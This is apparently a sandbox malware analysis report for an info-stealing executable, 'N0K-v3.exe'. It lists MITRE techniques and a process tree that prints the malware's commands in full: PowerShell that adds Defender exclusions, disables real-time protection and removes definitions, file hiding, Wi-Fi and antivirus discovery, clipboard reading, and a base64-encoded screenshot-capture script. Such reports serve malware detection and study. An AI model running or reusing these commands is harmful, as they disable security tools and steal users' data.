3f552e19dbdfa3a8d74b4a33369ae6d74efca83a06df7c0b7cf7700e69ca9318

Analysis

max time kernel
4s
max time network
24s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-12-2024 14:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

N0K-v3.exe
Size

7.3MB
MD5

66cb0645ac59985e73e2f0bf153c067a
SHA1

41a934e186ababb688c26e8834cd56e90baa05c6
SHA256

3f552e19dbdfa3a8d74b4a33369ae6d74efca83a06df7c0b7cf7700e69ca9318
SHA512

50195bce0be69cc838ce9e74716a93b7915c61b836b418248c6a468c46737ff7a7e237a8662d9227faca1ac09a2db29b5ccf6d41cf0ccc3a265ece0f3ccb5c59
SSDEEP

98304:3heYgZhUO6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3zCUTVv9JT1sOBN3o1py:38YS65OshoKMuIkhVastRL5Di3u01D7b

Score

8^/10

collection defense_evasion discovery execution upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4368	powershell.exe
2292	powershell.exe
1504	powershell.exe
3036	powershell.exe
2460	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2368	cmd.exe
1764	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe
3300	N0K-v3.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
37	discord.com
38	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
35	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4808	tasklist.exe
1068	tasklist.exe
4892	tasklist.exe
2508	tasklist.exe
2716	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4140	cmd.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023caf-21.dat	upx
behavioral1/memory/3300-25-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp	upx
behavioral1/files/0x0007000000023ca2-27.dat	upx
behavioral1/files/0x0007000000023cad-29.dat	upx
behavioral1/memory/3300-48-0x00007FFE6C3E0000-0x00007FFE6C3EF000-memory.dmp	upx
behavioral1/memory/3300-47-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp	upx
behavioral1/files/0x0007000000023ca9-46.dat	upx
behavioral1/files/0x0007000000023ca8-45.dat	upx
behavioral1/files/0x0007000000023ca7-44.dat	upx
behavioral1/files/0x0007000000023ca6-43.dat	upx
behavioral1/files/0x0007000000023ca5-42.dat	upx
behavioral1/files/0x0007000000023ca4-41.dat	upx
behavioral1/files/0x0007000000023ca3-40.dat	upx
behavioral1/files/0x0007000000023ca1-39.dat	upx
behavioral1/files/0x0007000000023cb4-38.dat	upx
behavioral1/files/0x0007000000023cb3-37.dat	upx
behavioral1/files/0x0007000000023cac-32.dat	upx
behavioral1/files/0x0007000000023cb2-36.dat	upx
behavioral1/files/0x0007000000023cae-33.dat	upx
behavioral1/memory/3300-54-0x00007FFE60AE0000-0x00007FFE60B0D000-memory.dmp	upx
behavioral1/memory/3300-56-0x00007FFE632B0000-0x00007FFE632C9000-memory.dmp	upx
behavioral1/memory/3300-58-0x00007FFE60A50000-0x00007FFE60A73000-memory.dmp	upx
behavioral1/memory/3300-60-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp	upx
behavioral1/memory/3300-62-0x00007FFE65660000-0x00007FFE65679000-memory.dmp	upx
behavioral1/memory/3300-64-0x00007FFE66A50000-0x00007FFE66A5D000-memory.dmp	upx
behavioral1/memory/3300-66-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp	upx
behavioral1/memory/3300-69-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp	upx
behavioral1/memory/3300-72-0x00007FFE547E0000-0x00007FFE54D00000-memory.dmp	upx
behavioral1/memory/3300-73-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp	upx
behavioral1/memory/3300-71-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp	upx
behavioral1/memory/3300-80-0x00007FFE546C0000-0x00007FFE547DC000-memory.dmp	upx
behavioral1/memory/3300-78-0x00007FFE66A00000-0x00007FFE66A0D000-memory.dmp	upx
behavioral1/memory/3300-76-0x00007FFE64110000-0x00007FFE64124000-memory.dmp	upx
behavioral1/memory/3300-81-0x00007FFE60A50000-0x00007FFE60A73000-memory.dmp	upx
behavioral1/memory/3300-94-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp	upx
behavioral1/memory/3300-111-0x00007FFE65660000-0x00007FFE65679000-memory.dmp	upx
behavioral1/memory/3300-112-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp	upx
behavioral1/memory/3300-113-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp	upx
behavioral1/memory/3300-164-0x00007FFE547E0000-0x00007FFE54D00000-memory.dmp	upx
behavioral1/memory/3300-212-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp	upx
behavioral1/memory/3300-202-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp	upx
behavioral1/memory/3300-211-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp	upx
behavioral1/memory/3300-203-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp	upx
behavioral1/memory/3300-322-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp	upx
behavioral1/memory/3300-327-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp	upx
behavioral1/memory/3300-321-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp	upx
behavioral1/memory/3300-342-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp	upx
behavioral1/memory/3300-341-0x00007FFE60A50000-0x00007FFE60A73000-memory.dmp	upx
behavioral1/memory/3300-354-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp	upx
behavioral1/memory/3300-353-0x00007FFE66A50000-0x00007FFE66A5D000-memory.dmp	upx
behavioral1/memory/3300-352-0x00007FFE65660000-0x00007FFE65679000-memory.dmp	upx
behavioral1/memory/3300-351-0x00007FFE547E0000-0x00007FFE54D00000-memory.dmp	upx
behavioral1/memory/3300-350-0x00007FFE546C0000-0x00007FFE547DC000-memory.dmp	upx
behavioral1/memory/3300-349-0x00007FFE66A00000-0x00007FFE66A0D000-memory.dmp	upx
behavioral1/memory/3300-348-0x00007FFE64110000-0x00007FFE64124000-memory.dmp	upx
behavioral1/memory/3300-346-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp	upx
behavioral1/memory/3300-340-0x00007FFE632B0000-0x00007FFE632C9000-memory.dmp	upx
behavioral1/memory/3300-339-0x00007FFE60AE0000-0x00007FFE60B0D000-memory.dmp	upx
behavioral1/memory/3300-338-0x00007FFE6C3E0000-0x00007FFE6C3EF000-memory.dmp	upx
behavioral1/memory/3300-337-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp	upx
behavioral1/memory/3300-336-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp	upx

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2196	cmd.exe
4724	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1064	cmd.exe
5044	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
64	WMIC.exe
4756	WMIC.exe
2608	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2908	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4724	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4368	powershell.exe
4368	powershell.exe
1504	powershell.exe
1504	powershell.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	4368	powershell.exe
Token: SeIncreaseQuotaPrivilege	1084	WMIC.exe
Token: SeSecurityPrivilege	1084	WMIC.exe
Token: SeTakeOwnershipPrivilege	1084	WMIC.exe
Token: SeLoadDriverPrivilege	1084	WMIC.exe
Token: SeSystemProfilePrivilege	1084	WMIC.exe
Token: SeSystemtimePrivilege	1084	WMIC.exe
Token: SeProfSingleProcessPrivilege	1084	WMIC.exe
Token: SeIncBasePriorityPrivilege	1084	WMIC.exe
Token: SeCreatePagefilePrivilege	1084	WMIC.exe
Token: SeBackupPrivilege	1084	WMIC.exe
Token: SeRestorePrivilege	1084	WMIC.exe
Token: SeShutdownPrivilege	1084	WMIC.exe
Token: SeDebugPrivilege	1084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1084	WMIC.exe
Token: SeRemoteShutdownPrivilege	1084	WMIC.exe
Token: SeUndockPrivilege	1084	WMIC.exe
Token: SeManageVolumePrivilege	1084	WMIC.exe
Token: 33	1084	WMIC.exe
Token: 34	1084	WMIC.exe
Token: 35	1084	WMIC.exe
Token: 36	1084	WMIC.exe
Token: SeDebugPrivilege	1068	tasklist.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeIncreaseQuotaPrivilege	1084	WMIC.exe
Token: SeSecurityPrivilege	1084	WMIC.exe
Token: SeTakeOwnershipPrivilege	1084	WMIC.exe
Token: SeLoadDriverPrivilege	1084	WMIC.exe
Token: SeSystemProfilePrivilege	1084	WMIC.exe
Token: SeSystemtimePrivilege	1084	WMIC.exe
Token: SeProfSingleProcessPrivilege	1084	WMIC.exe
Token: SeIncBasePriorityPrivilege	1084	WMIC.exe
Token: SeCreatePagefilePrivilege	1084	WMIC.exe
Token: SeBackupPrivilege	1084	WMIC.exe
Token: SeRestorePrivilege	1084	WMIC.exe
Token: SeShutdownPrivilege	1084	WMIC.exe
Token: SeDebugPrivilege	1084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1084	WMIC.exe
Token: SeRemoteShutdownPrivilege	1084	WMIC.exe
Token: SeUndockPrivilege	1084	WMIC.exe
Token: SeManageVolumePrivilege	1084	WMIC.exe
Token: 33	1084	WMIC.exe
Token: 34	1084	WMIC.exe
Token: 35	1084	WMIC.exe
Token: 36	1084	WMIC.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 500 wrote to memory of 3300	500	N0K-v3.exe	84
PID 500 wrote to memory of 3300	500	N0K-v3.exe	84
PID 3300 wrote to memory of 704	3300	N0K-v3.exe	85
PID 3300 wrote to memory of 704	3300	N0K-v3.exe	85
PID 3300 wrote to memory of 244	3300	N0K-v3.exe	86
PID 3300 wrote to memory of 244	3300	N0K-v3.exe	86
PID 3300 wrote to memory of 4100	3300	N0K-v3.exe	89
PID 3300 wrote to memory of 4100	3300	N0K-v3.exe	89
PID 3300 wrote to memory of 4856	3300	N0K-v3.exe	90
PID 3300 wrote to memory of 4856	3300	N0K-v3.exe	90
PID 704 wrote to memory of 4368	704	cmd.exe	93
PID 704 wrote to memory of 4368	704	cmd.exe	93
PID 4856 wrote to memory of 1084	4856	cmd.exe	94
PID 4856 wrote to memory of 1084	4856	cmd.exe	94
PID 4100 wrote to memory of 1068	4100	cmd.exe	95
PID 4100 wrote to memory of 1068	4100	cmd.exe	95
PID 244 wrote to memory of 1504	244	cmd.exe	96
PID 244 wrote to memory of 1504	244	cmd.exe	96

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5084	attrib.exe
3508	attrib.exe
4140	attrib.exe

C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe
"C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:500
- C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe
  "C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4100
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:1428
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:1436
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    PID:4140
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\N0K-v3.exe"
      4⤵
      Views/modifies file attributes
      PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    PID:2816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2320
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3764
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4000
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2084
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4500
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1064
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1816
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1284
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAg